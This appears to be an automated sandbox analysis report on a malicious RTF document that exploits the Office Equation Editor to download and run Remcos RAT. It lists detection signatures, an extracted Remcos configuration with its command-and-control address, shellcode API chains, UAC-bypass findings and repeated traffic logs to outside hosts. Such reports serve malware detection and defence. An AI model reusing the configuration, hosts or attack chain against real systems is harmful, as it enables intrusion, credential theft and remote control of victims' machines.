Windows Analysis Report
WC5Gv13cOQ.rtf

Overview

General Information

Sample name: WC5Gv13cOQ.rtf
renamed because original name is a hash value
Original sample name: 904af9fb7e5bee74577f430af1080585.rtf
Analysis ID: 1532435
MD5: 904af9fb7e5bee74577f430af1080585
SHA1: 71b79e6f053b89985d109d81670f2dce172775ae
SHA256: 98bcb2a98c5347e4409349f1605a7883a40a541cffc4aa62bf7c77b5160cdd20
Tags: rtf
Infos:

Detection

Remcos
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Contains functionality to bypass UAC (CMSTPLUA)
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Sigma detected: Remcos
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
Binary is likely a compiled AutoIt script file
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionalty to change the wallpaper
Delayed program exit found
Document exploit detected (process start blacklist hit)
Drops VBS files to the startup folder
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Office equation editor drops PE file
Office equation editor establishes network connection
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Searches for Windows Mail specific files
Shellcode detected
Sigma detected: Equation Editor Network Connection
Sigma detected: Suspicious Binary In User Directory Spawned From Office Application
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: WScript or CScript Dropper
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Yara detected WebBrowserPassView password recovery tool
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to download and execute PE files
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to execute programs as a different user
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Uncommon Svchost Parent Process
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Keylogger Generic
Yara signature match

Classification

Name Description Attribution Blogpost URLs Link
Remcos, RemcosRAT Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
 https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: WC5Gv13cOQ.rtf Avira: detected
Found malware configuration
Source: 14.2.svchost.exe.400000.0.unpack Malware Configuration Extractor: Remcos {"Version": "5.1.3 Pro", "Host:Port:Password": "107.173.4.16:2404", "Assigned name": "newest", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-FI789R", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\taskhostw[1].exe ReversingLabs: Detection: 55%
Source: C:\Users\user\AppData\Local\directory\name.exe ReversingLabs: Detection: 55%
Source: C:\Users\user\AppData\Roaming\taskhostw.exe ReversingLabs: Detection: 55%
Multi AV Scanner detection for submitted file
Source: WC5Gv13cOQ.rtf ReversingLabs: Detection: 52%
Source: WC5Gv13cOQ.rtf Virustotal: Detection: 50% Perma Link
Yara detected Remcos RAT
Source: Yara match File source: 14.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.name.exe.d70000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.name.exe.d70000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.svchost.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.name.exe.28e0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.svchost.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.name.exe.28e0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000E.00000002.394468723.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.394502954.0000000000794000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.854766910.0000000000234000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.854880979.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.365614526.0000000000D70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.394764051.00000000028E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: name.exe PID: 3580, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: svchost.exe PID: 3592, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: name.exe PID: 3856, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: svchost.exe PID: 3892, type: MEMORYSTR
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\directory\name.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\taskhostw[1].exe Joe Sandbox ML: detected
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_004338C8 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext, 7_2_004338C8
Source: name.exe, 00000006.00000002.365614526.0000000000D70000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: -----BEGIN PUBLIC KEY----- memstr_27fe3722-c

Exploits
barindex
Yara detected UAC Bypass using CMSTP
Source: Yara match File source: 14.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.name.exe.d70000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.name.exe.d70000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.svchost.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.name.exe.28e0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.svchost.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.name.exe.28e0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000E.00000002.394468723.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.854880979.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.365614526.0000000000D70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.394764051.00000000028E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: name.exe PID: 3580, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: svchost.exe PID: 3592, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: name.exe PID: 3856, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: svchost.exe PID: 3892, type: MEMORYSTR
Office equation editor establishes network connection
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Network connect: IP: 104.168.7.25 Port: 80 Jump to behavior
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\AppData\Roaming\taskhostw.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\AppData\Roaming\taskhostw.exe Jump to behavior
Office Equation Editor has been started
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding

Privilege Escalation
barindex
Contains functionality to bypass UAC (CMSTPLUA)
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_00407538 _wcslen,CoGetObject, 7_2_00407538
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: wntdll.pdb source: name.exe, 00000006.00000003.364862213.0000000002BC0000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000006.00000003.364383190.0000000001150000.00000004.00001000.00020000.00000000.sdmp, name.exe, 0000000D.00000003.394321762.0000000002BB0000.00000004.00001000.00020000.00000000.sdmp, name.exe, 0000000D.00000003.394032155.00000000029C0000.00000004.00001000.00020000.00000000.sdmp
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 5_2_00D5449B GetFileAttributesW,FindFirstFileW,FindClose, 5_2_00D5449B
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 5_2_00D5C7E8 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 5_2_00D5C7E8
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 5_2_00D5C75D FindFirstFileW,FindClose, 5_2_00D5C75D
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 5_2_00D5F021 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 5_2_00D5F021
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 5_2_00D5F17E SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 5_2_00D5F17E
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 6_2_013F449B GetFileAttributesW,FindFirstFileW,FindClose, 6_2_013F449B
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 6_2_013FC75D FindFirstFileW,FindClose, 6_2_013FC75D
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 6_2_013FC7E8 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 6_2_013FC7E8
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 6_2_013FF17E SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 6_2_013FF17E
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 6_2_013FF021 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 6_2_013FF021
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 6_2_013FF47F FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, 6_2_013FF47F
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 6_2_013F3833 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 6_2_013F3833
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 6_2_013F3B56 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 6_2_013F3B56
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 6_2_013FBD48 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, 6_2_013FBD48
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_0040928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose, 7_2_0040928E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_0041C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose, 7_2_0041C322
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_0040C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose, 7_2_0040C388
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_004096A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose, 7_2_004096A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_00408847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose, 7_2_00408847
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_00407877 FindFirstFileW,FindNextFileW, 7_2_00407877
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_0044E8F9 FindFirstFileExA, 7_2_0044E8F9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_0040BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose, 7_2_0040BB6B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_00419B86 FindFirstFileW,FindNextFileW,FindNextFileW, 7_2_00419B86
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_0040BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose, 7_2_0040BD72
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_100010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 7_2_100010F1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_10006580 FindFirstFileExA, 7_2_10006580
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_00407CD2 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW, 7_2_00407CD2
Source: C:\Windows\SysWOW64\svchost.exe File opened: C:\Windows\SysWOW64\config\systemprofile\ Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\ Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\ Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Caches\ Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\ Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ Jump to behavior

Software Vulnerabilities
barindex
Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Shellcode detected
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_00683F21 LoadLibraryW,URLDownloadToFileW,ShellExecuteW,ExitProcess, 2_2_00683F21
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_00683FC6 ShellExecuteW,ExitProcess, 2_2_00683FC6
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_00683F98 URLDownloadToFileW,ShellExecuteW,ExitProcess, 2_2_00683F98
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_00683EA3 URLDownloadToFileW,ShellExecuteW,ExitProcess, 2_2_00683EA3
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_00683F3B URLDownloadToFileW,ShellExecuteW,ExitProcess, 2_2_00683F3B
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_00683FEB ExitProcess, 2_2_00683FEB
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_00683FB1 ShellExecuteW,ExitProcess, 2_2_00683FB1
Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: geoplugin.net
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 178.237.33.50:80
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 104.168.7.25:80
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49161
